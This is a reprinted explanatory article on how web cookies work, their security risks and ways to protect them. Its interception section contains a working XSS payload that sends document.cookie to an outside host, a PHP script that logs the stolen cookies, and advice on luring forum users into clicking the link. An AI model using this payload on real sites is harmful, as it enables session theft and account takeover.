[Reprint] Talk about cookies

Source: Internet
Author: User
Tags: ssl connection



0x00 Introduction



In the history of Web technology, the advent of cookies was a major change. Yet cookies have been controversial from the day they were born, among both ordinary network users and Web developers: not because the cookie mechanism is too weak, but because the use of cookies can harm the privacy of network users.



Cookie technology was first introduced by Netscape in its Navigator browser. The World Wide Web Consortium later supported and adopted the cookie standard, and Microsoft also used cookies in the Internet Explorer browser. Most browsers now support cookies, or at least allow cookie technology to be used, and today almost all Web designers use it. The widespread use of cookies has led to concern about the security of personal information: some websites and institutions abuse cookies to collect other people's personal data without the visitor's permission, build user databases, send advertising and pursue other profit-making purposes, resulting in the disclosure of users' private information.



In view of this, this article systematically studies the technical characteristics of cookies and their security issues, and examines measures to prevent cookies from disclosing users' private information, so as not only to protect personal information but also to let cookie technology serve Internet applications more securely.



0x01 Cookie Technical Analysis



1.1 Cookie definition and its functions



As defined in the official Netscape document, a cookie is a way for a server or script to maintain information on the client computer under the HTTP protocol. In layman's terms, a cookie is a technique that lets a Web server store a small amount of data on the client's hard disk or in its memory, or read data back from the client's hard disk. A cookie file is a small text file stored on the browser client's computer, created by the Web server's CGI script when the user browses the site, and named in the format: user name@web address[number].txt.



The cookie file records information about the user, such as an identification number (ID), a password, the pages visited, the time spent, how the user shopped on the site, or how many times the user visited it. When the user connects to the Web server again, the browser reads the cookie information and passes it back to the Web site.



The pieces of information in a cookie file are stored as "name/value" pairs (name-value pairs); a "name/value" pair is simply a named piece of data. For example, if you visit the www.goto.com Web site, the site may generate a cookie file on the client computer containing the following: UserID a9a3bece0563982d www.goto.com/. GoTo.com stores a single "name/value" pair on the computer, where the "name" is UserID and the "value" is a9a3bece0563982d.



The location of the cookie file depends closely on the operating system and browser; the files are called cookie files on Windows machines and MagicCookie files on Macintosh machines. For Windows with Internet Explorer, the cookie file is stored in the following locations:


Win9x: C:\Windows\Cookies
WinMe: C:\Windows\Profiles\<user name>\Cookies
Win2k: C:\Windows\Cookies
WinXP: C:\Documents and Settings\<user name>\Cookies
Win7 and above: C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Cookies


The primary function of a cookie is to record the user's personal information; its most fundamental purpose is to help the Web site save information about the visitor. More generally, a cookie is a way of maintaining Web application continuity, that is, execution state management.



HTTP is a stateless, connectionless protocol: the server cannot maintain continuous state information for a session. As the WWW developed, the statelessness of HTTP could no longer meet the needs of some applications and became an inconvenience for both Web servers and clients. In this context the state management mechanism of HTTP, the cookie mechanism, was proposed as a supplement to the HTTP protocol for maintaining continuous state between server and client.



1.2 Basic working principle of cookies



Cookies use HTTP headers to pass data. The cookie mechanism defines two headers: the Set-Cookie header and the Cookie header. The Set-Cookie header is carried in the Web server's response header, and the Cookie header is carried in the browser client's request header.



The operation of cookies is analysed step by step as follows.

[Figure: operating process diagram of cookies]



(1) The client types the URL of the Web server into the browser's address bar, and the browser sends a request to read the page.



(2) When the server receives the request, it generates a Set-Cookie header, places it in the HTTP response returned to the client, and so starts a session.



(3) After the client receives the response, in order to continue the session, the contents of the Set-Cookie header are extracted and stored in a Cookie.txt file on the client computer.



(4) When the client makes another request to the server, the browser first searches the computer for that Web site's Cookie.txt file. If it is found, a Cookie header is generated from it and sent to the server in the HTTP request.



(5) The server receives the request containing the Cookie header, retrieves the user's information from the cookie, and generates a page response tailored to that client. Every page request the browser makes, for example when a page is opened or refreshed, can pass along an existing cookie file.



0x02 Cookie Application



(1) Implementing user authentication on the Web



One of the big drawbacks of the HTTP protocol is that it does not identify the user, which is a great inconvenience to programmers; cookies compensate for this flaw. Most sites use the cookie mechanism for user identity authentication, so that after the first authentication the user no longer needs to enter an account number, password and so on, saving the trouble of logging in again.



(2) Customizing a personalized space



Cookie technology makes it easy for a Web site to customize information for different users, to give users a personalized and more user-friendly browsing environment, and to collect visitor information more accurately. For example, a site can give users the right to change the content, layout and colour of its pages, let users enter their own information, and then use that information to adjust parameters and customize the appearance of the pages.



In addition, because of cost, bandwidth constraints and other reasons, users do not want to browse all of a site's content on every visit. With cookies a site can arrange its columns according to personal preference and dynamically generate the content each user needs, catering to users with different interests, reducing the number of choices the user has to make, and using the Web server's transmission bandwidth more reasonably.



(3) Website access statistics



With proxies, caches and the like in the way, the way to let a site count its visitors accurately is to create a unique ID for each visitor. Using cookies, a site can determine how many people have visited, how many of them are new and how many are returning, and how often a given user visits the website.



The basic approach is that, with the help of a back-end database, when a user first accesses the site the site creates a new ID in the database and sends it to the user in a cookie. When the user visits again, the site adds 1 to that ID's counter, obtaining the user's number of visits and determining whether the user is new or returning.



The following is a program that counts visits with a cookie, written in ASP, which counts how many times the user has accessed the page:


    <%@ LANGUAGE=JScript %>
    <%
    // Read the visit counter from the CountNumber cookie; a first-time visitor has none.
    var count = Request.Cookies("CountNumber");
    if (count == null || count == "") {
        count = "0";
    }
    // Increment the counter and write the new value back to the client.
    count = (parseInt(count, 10) + 1).toString();
    Response.Cookies("CountNumber") = count;
    %>


(4) Maintaining online e-commerce customer information



Online ordering businesses use cookie technology to record the items a user wants to buy. The user puts items in the "shopping cart", and the site records them in the database under the user's ID. When the user "pays", the site retrieves all of the user's choices from the database by ID and so knows what is in the "shopping cart". Cookies simplify ordering and bring online shopping closer to real life.



(5) Recording the site trail



When you visit the same Web site again, the cookie can be read back; this is an attribute of cookies. It is used to implement many design features, such as displaying the number of times a user has visited the page, showing the user's last access time, or recalling the user's previous selections on the page, without the need for complex CGI programming.



0x03 Security issues with cookies



Cookies are designed to bring convenience to users and add value to the website, and generally do not pose a serious security threat. A cookie file cannot be executed as code, it does not transmit viruses, it is private to the user and can only be read by the server that created it. In addition, browsers generally allow only 300 cookies in total and at most 20 per site, and each cookie is limited to 4 KB, so cookies cannot fill the hard disk and cannot be used as a means of "denial of service" attack.



However, because a cookie stands in for the user's identity, its security sometimes determines the security of the whole system, and it cannot be neglected.



(1) Cookie spoofing



A cookie records information such as the user's account ID and password, which is usually transmitted online after processing with MD5. Information processed in this way cannot be understood even if someone with ulterior motives intercepts it on the network. The problem, however, is that the person who intercepts the cookie does not need to understand what the strings mean: as long as the cookie is submitted to the server and passes authentication, the interceptor can impersonate the victim to the site. This behaviour is called cookie spoofing.



Through cookie spoofing an illegal user obtains the corresponding encryption key and thereby gains access to the legitimate user's personalized information, including e-mail and even account information, causing serious harm to personal information.



(2) Cookie interception



Cookies are transmitted in plain text between browser and server and are easily intercepted and exploited by others. Anyone who can intercept Web traffic can read the cookie.



If a cookie is intercepted by an illegal user and replayed within its validity period, the illegal user enjoys the rights of the legitimate user. For example, in online reading, an illegal user can read e-magazines online without paying a fee.



The means of intercepting cookies are as follows.



(1) Intercepting cookies by means of programming. Its method is analysed below; it is completed in two steps. Step one: locate the website whose cookies are to be collected, analyse it and construct the URL. First open the target site (assumed here to be http://www.XXX.net), enter the user name "<Al>" (without quotation marks) on the login page, and analyse the captured packet, which yields the following:


    http://www.XXX.net/tXl/login/login.pl?Username=<Al>&passwd=&ok.x=28&ok.y=6


Replace "<Al>" with:



    <script>alert(document.cookie)</script>

Retry; if it executes successfully, start constructing the URL:


    http://www.XXX.net/tXl/login/login.pl?Username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6


Here http://www.cbifamily.org/cbi.php is a script on a host that the user controls. Note that "%2b" is the URL encoding of the "+" symbol, because a bare "+" is treated as a space. The URL can then be posted in a forum to entice others to click it.



Step two: write a PHP script that collects cookies and place it on a Web site that the user controls; the PHP code runs when an unsuspecting person clicks the constructed URL. The script is as follows:


    <?php
    // Append whatever arrived in the query string (the document.cookie value
    // carried by the constructed URL) to a text file.
    $info = getenv("QUERY_STRING");
    if ($info) {
        $fp = fopen("info.txt", "a");
        fwrite($fp, $info . "\n");
        fclose($fp);
    }
    // The redirect target is truncated in the source; the assumed site's
    // front page is used here so the visitor sees nothing unusual.
    header("Location: http://www.XXX.net/");
    ?>


With this code on the Web, everyone's cookies can be collected. If a forum allows HTML code or the use of Flash tags, these techniques can be used to collect cookies through the forum: give the post an appealing title, write interesting content, and a large number of cookies is collected quickly. Many people's forum passwords have been stolen this way.



(2) Intercepting cookies through the hidden danger in Flash code. Flash has a getURL() function with which a Flash movie can automatically open a specified Web page, which may lead the user to a site containing malicious code. For example, while a user is enjoying a Flash animation on the computer, code in an animation frame may quietly connect to the Internet and open a tiny page with special code that collects cookies and can do other harmful things. The hosting site cannot suppress this, since it is an internal function of the Flash file.



(3) Cookies leak network privacy



The main reasons cookies cause network privacy leaks are: ① The drive of business interests. With the rise of e-commerce and the huge business opportunities on the Internet, some websites and institutions misuse cookies and, without the visitor's permission, use search engine technology, data mining technology or even network deception to collect other people's personal data, build user databases, send advertising and pursue other profit-making purposes, disclosing users' personal privacy. ② The openness of cookie information delivery. The cookie file has a particular delivery process and is plain text, and unprotected cookie files are transmitted between server and client, which can easily lead to the disclosure of personal information.



0x04 Security measures to protect against cookie leaks



How can cookies be applied safely in the face of these security issues?



(1) Strengthen awareness of security precautions



Cookies are relatively harmless, but they can be used to track users, and anyone using cookies must be aware of their inherent security weaknesses.



The content stored in a cookie may well be the user's personal data. For example, for the user's convenience a website may use cookies to store the member's registration information: e-mail address, site user name, user password, credit card number and so on, so that the user does not have to re-enter the data when logging in. If someone steals such a cookie file, he can impersonate the user and log in to the site, which poses an unpredictable threat to the security of the user's personal information.



Therefore, store only unimportant data in the cookie, such as user preferences or other information that has no significant impact on the application. If you do need to save sensitive information in a cookie, encrypt it to prevent others from stealing it. You can also set the cookie's properties so that it is only transferred over a connection that uses Secure Sockets Layer (SSL). SSL does not prevent a cookie stored on the user's computer from being read or manipulated by others, but it does prevent the cookie from being intercepted in transit.
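The Set-Cookie/Cookie exchange of section 1.2 and the SSL-only property just described, as an added worked example that is not code from the original article: a small Python cookie jar that stores what the server sets and decides what to send back, refusing to attach a Secure cookie to a plain http:// request. The UserID value is the GoTo.com one from section 1.1; the SessionToken cookie and the response headers are constructed samples.

```python
from http.cookies import SimpleCookie
from urllib.parse import urlsplit


class CookieJar:
    """Minimal client-side cookie store (illustrative; not a full RFC 6265 jar)."""

    def __init__(self):
        self.store = {}  # (host, cookie name) -> Morsel

    def receive(self, url, response_headers):
        """Step (3): take every Set-Cookie header out of a response and store it."""
        host = urlsplit(url).hostname
        for name, value in response_headers:
            if name.lower() != "set-cookie":
                continue
            parsed = SimpleCookie()
            parsed.load(value)  # parses name=value plus attributes such as Path and Secure
            for key, morsel in parsed.items():
                self.store[(host, key)] = morsel

    def request_header(self, url):
        """Step (4): build the Cookie header value for a request, or None if nothing applies."""
        parts = urlsplit(url)
        host, scheme, path = parts.hostname, parts.scheme, parts.path or "/"
        pairs = []
        for (cookie_host, key), morsel in self.store.items():
            if cookie_host != host:
                continue  # a cookie only goes back to the host that set it
            if not path.startswith(morsel["path"] or "/"):
                continue  # the Path attribute limits which URLs receive the cookie
            if morsel["secure"] and scheme != "https":
                continue  # Secure cookie: never attached to a plain HTTP request
            pairs.append(f"{key}={morsel.value}")
        return "; ".join(pairs) if pairs else None


def demo():
    """Walk the exchange: the server sets two cookies, the client sends them back selectively."""
    jar = CookieJar()
    # Constructed response: the GoTo.com UserID from the text plus an assumed Secure session cookie.
    response_headers = [
        ("Content-Type", "text/html"),
        ("Set-Cookie", "UserID=a9a3bece0563982d; Path=/"),
        ("Set-Cookie", "SessionToken=example-session-value; Path=/account; Secure"),
    ]
    jar.receive("https://www.goto.com/", response_headers)
    return {
        "https_account": jar.request_header("https://www.goto.com/account/orders"),
        "http_account": jar.request_header("http://www.goto.com/account/orders"),
        "https_root": jar.request_header("https://www.goto.com/"),
        "other_host": jar.request_header("https://www.example.com/"),
    }


if __name__ == "__main__":
    for case, header in demo().items():
        print(f"{case}: Cookie: {header}")
```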



(2) Configuring a secure browser



The toolbars of the IE and Netscape browsers have settings that prohibit cookies, and you can set whether to be prompted when a site wants to create a cookie on your computer. This lets the user choose to allow or deny creation of the cookie. Note that some websites require cookies, and prohibiting cookies outright makes such sites impossible to view.



Using IE6 is more secure. The latest IE6 offers a variety of privacy features, including viewing a website's P3P privacy policy to see how the site uses personally identifiable information, cookie privacy settings that decide whether a website's cookies may be stored on your computer, and a privacy alert when you visit a site that does not meet your privacy settings. Users can set cookie handling selectively.



(3) Installing a cookie management tool



① Cookie Crusher. The Limit Software's Cookie Crusher is for Netscape users and offers: managing the cookies already on your computer, keeping a list of websites that are prohibited from or allowed to create cookies, warning when a new cookie is created or an existing cookie is modified, prohibiting third-party cookies, accepting or rejecting a site's cookies in real time, recording cookie activity logs, editing cookies, and so on. While browsing, the program's analysis function can automatically determine the purpose of a cookie created by a website, for example whether the site uses the cookie to store information the user entered or to track the user's browsing habits.



② Cookie Pal. Besides the browser, other Internet software such as mail programs may also use cookies. To keep network privacy secure while ensuring that such software still uses cookie files correctly, you can install Kookaburra Software's Cookie Pal, a cookie management tool that supports a variety of software. It is dedicated to cookie management and lets users view, delete and edit existing cookies, automatically control in real time whether to accept cookies, filter cookies by expiry, record cookie activity, and edit a list of websites whose cookies are refused or allowed.



(4) Deleting in-memory cookies



Not all cookie information is stored as files on the hard disk; some is kept in memory. This type of cookie is usually generated automatically by the system in memory when the user accesses certain special websites, and once the visitor leaves the site the system removes it from memory automatically. To delete such cookies you need to modify the system settings with Registry Editor: run Regedit and find the following key:



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Special Paths\Cookies. This is the key for in-memory cookies, and it is the key to delete: right-click Cookies, click the Delete command on the shortcut menu, and confirm the deletion.



(5) Using AAS technology



In 2002 the US company Ingrian Networks published a platform, "Active Application Security (AAS)", that can protect a Web site from "cookie poisoning (cookie tampering)" attacks. The AAS platform encrypts the important information inside the cookie and attaches an electronic signature. Each time the Web server communicates with the client, it uses the electronic signature to confirm the contents of the cookie. If a malicious user deletes the electronic signature or changes the content, the signature and the cookie content no longer match; at that point AAS blocks the cookie and refuses to return information to the Web site. In addition, the platform encrypts the cookie content with 3DES, and decryption requires a password, so the cookie is stored securely. Communication between the WWW server and the client also uses an SSL connection to secure the communication route. Through the combined use of electronic signatures, encryption, SSL connections and other technologies, a strong security scheme is formed that closes the vulnerabilities of both the communication route and data storage, and eliminates tampering with cookies.
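The sign-then-verify part of the AAS scheme, as an added example that is neither Ingrian's product nor code from the article: an HMAC-SHA256-signed cookie with an expiry, checked on every request so that a modified, forged or expired cookie is rejected, and emitted with the SSL-only attribute. The key, user names and timestamps are constructed placeholders; the encryption step (3DES in AAS) is left out because the standard library has no block cipher.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed demo key: a real deployment loads this from a secret store and rotates it.
SERVER_KEY = b"demo-signing-key-not-for-production"


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue(user_id, ttl_seconds, now=None):
    """Server side: serialise the claims and attach an HMAC-SHA256 signature over them."""
    now = time.time() if now is None else now
    claims = {"uid": user_id, "exp": int(now) + ttl_seconds}
    payload = _b64(json.dumps(claims, sort_keys=True).encode())
    signature = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).digest()
    return f"{payload}.{_b64(signature)}"


def verify(cookie_value, now=None):
    """Server side: return the claims only if signature and expiry check out, else None."""
    now = time.time() if now is None else now
    try:
        payload, signature = cookie_value.split(".", 1)
        expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).digest()
        # Constant-time comparison: a plain == would leak timing information.
        if not hmac.compare_digest(_unb64(signature), expected):
            return None
        claims = json.loads(_unb64(payload))
    except ValueError:  # missing separator, bad base64 or bad JSON
        return None
    if not isinstance(claims, dict) or claims.get("exp", 0) <= now:
        return None  # replay after the validity period (section 0x03 (2)) is refused
    return claims


def set_cookie_header(cookie_value):
    """Emit the token with Secure (the SSL-only transfer the text recommends) and HttpOnly,
    which keeps page scripts from reading it; HttpOnly is an addition beyond the page."""
    return f"Set-Cookie: AuthToken={cookie_value}; Path=/; Secure; HttpOnly"


def rewrite_claims(cookie_value, new_user_id):
    """Simulate the tampering AAS is meant to catch: change the claims, keep the old signature."""
    payload, signature = cookie_value.split(".", 1)
    claims = json.loads(_unb64(payload))
    claims["uid"] = new_user_id
    return f"{_b64(json.dumps(claims, sort_keys=True).encode())}.{signature}"


if __name__ == "__main__":
    token = issue("alice", ttl_seconds=3600)
    print(set_cookie_header(token))
    print("valid:", verify(token))
    print("tampered:", verify(rewrite_claims(token, "admin")))
```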



0x05 Concluding remarks



A cookie is a small amount of information sent by a Web server and stored on the client system for future queries. Its primary purpose is to store information, mainly the user's identifier and password, and to store the user's preferences for all possible settings. From a programming point of view, cookies solve the state management problem.



In fact, if the information is not associated with personal information, cookies are relatively harmless. However, cookies can be used to track users, and security issues such as cookie spoofing and disclosure of privacy can threaten the information security of network users.



Strengthening awareness of prevention, understanding the inherent security weaknesses of cookies, configuring a secure browser, using cookie management tools, and encrypting and transferring cookie data with technologies such as electronic signatures, encryption and SSL connections can effectively prevent cookies from disclosing user privacy and protect personal information, so that cookies can serve Web applications more securely.



Although cookie technology is controversial, it will not die out; what it needs is better security technology for its improvement and development. Cookie technology will have greater room to survive and develop in the future.




